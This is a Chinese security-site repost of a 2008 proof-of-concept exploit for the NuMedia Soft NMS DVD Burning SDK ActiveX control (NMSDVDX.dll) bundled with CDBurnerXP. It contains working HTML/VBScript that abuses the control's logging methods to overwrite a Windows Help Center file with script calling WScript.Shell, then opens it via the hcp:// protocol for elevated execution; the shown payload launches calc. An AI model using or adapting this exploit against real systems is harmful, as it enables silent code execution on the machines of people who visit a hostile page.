首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) Exploit 来源：http://retrogod.altervista.org/ 作者：Nine 发布时间：2008-09-19   <!-- 5.06 19/09/2008 ----------------------------------------------------------- -- NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) remote exploit -- by Nine:Situations:Group::bruiser software site: http://www.nugroovz.com/ our site: http://retrogod.altervista.org/ affected software: CDBurnerXP 4.2.1.976, ?? tested against IE6 settings: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe:  Safe for untrusted: caller,data  IPersist Safe:  Safe for untrusted: caller,data  mitigation: an "unlicensed software" box appears however, if the user close it or click "OK", the code will run normally explaination: "EnableLog" method can be used to overwrite a specified file, "LogMessage" one to write new lines on it. Trough the Help and Support Center and the pluggable "hcp://" protocol you can launch your file. Important to note: the Help Center will host the page with elevated privileges, allowing the page to script arbitrary controls with no prompts presented to the user. This was suggested by rgod (see hj forum) as a way to immediately execute the shell --------------------------------------------------------------------------- --> <html> <title> :( </title> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='DVDEngineX' /> </object> <script language='vbscript'>         DVDEngineX.Initialize True         sLogFileName="C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\msinfo.htm"     bCreateNew=True     DVDEngineX.EnableLog sLogFileName ,bCreateNew         nl=unescape("%0d%0a")     'my garbage ...     sMsg="<HTML>" & _          "<SCRIPT LANGUAGE=VBScript>" & nl & _          "Dim WshShell, oExec" & nl & _          "Set WshShell = CreateObject(""WScript.Shell"")" & nl & _          "Set oExec = WshShell.Exec(""calc"")" & nl & _          "Do While oExec.Status = 0" & nl & _          "WScript.Sleep 100" & nl & _          "Loop" & nl & _          "WScript.Echo oExec.Status" & nl & _          "<" & Chr(47) & "SCRIPT>" & nl & _          "<" & Chr(47) & "HTML>"     DVDEngineX.LogMessage sMsg         window.location = "hcp://system/sysinfo/msinfo.htm" </script> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·addalink <= 4 Arbitrary Admin ·Pluck 4.5.3 (update.php) Remot ·Femitter FTP Server 1.03 (RETR ·DESlock+ <= 3.2.7 Local Kernel ·Cisco Router HTTP Administrati ·DESlock+ <= 3.2.7 Local Kernel ·Cisco Router HTTP Administrati ·DESlock+ <= 3.2.7 (probe read) ·WonderWare SuiteLink 2.0 Remot ·Invision Power Board <= 2.3.5 ·Postfix < 2.4.9, 2.5.5, 2.6-20 ·DESlock+ 3.2.7 (vdlptokn.sys)   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved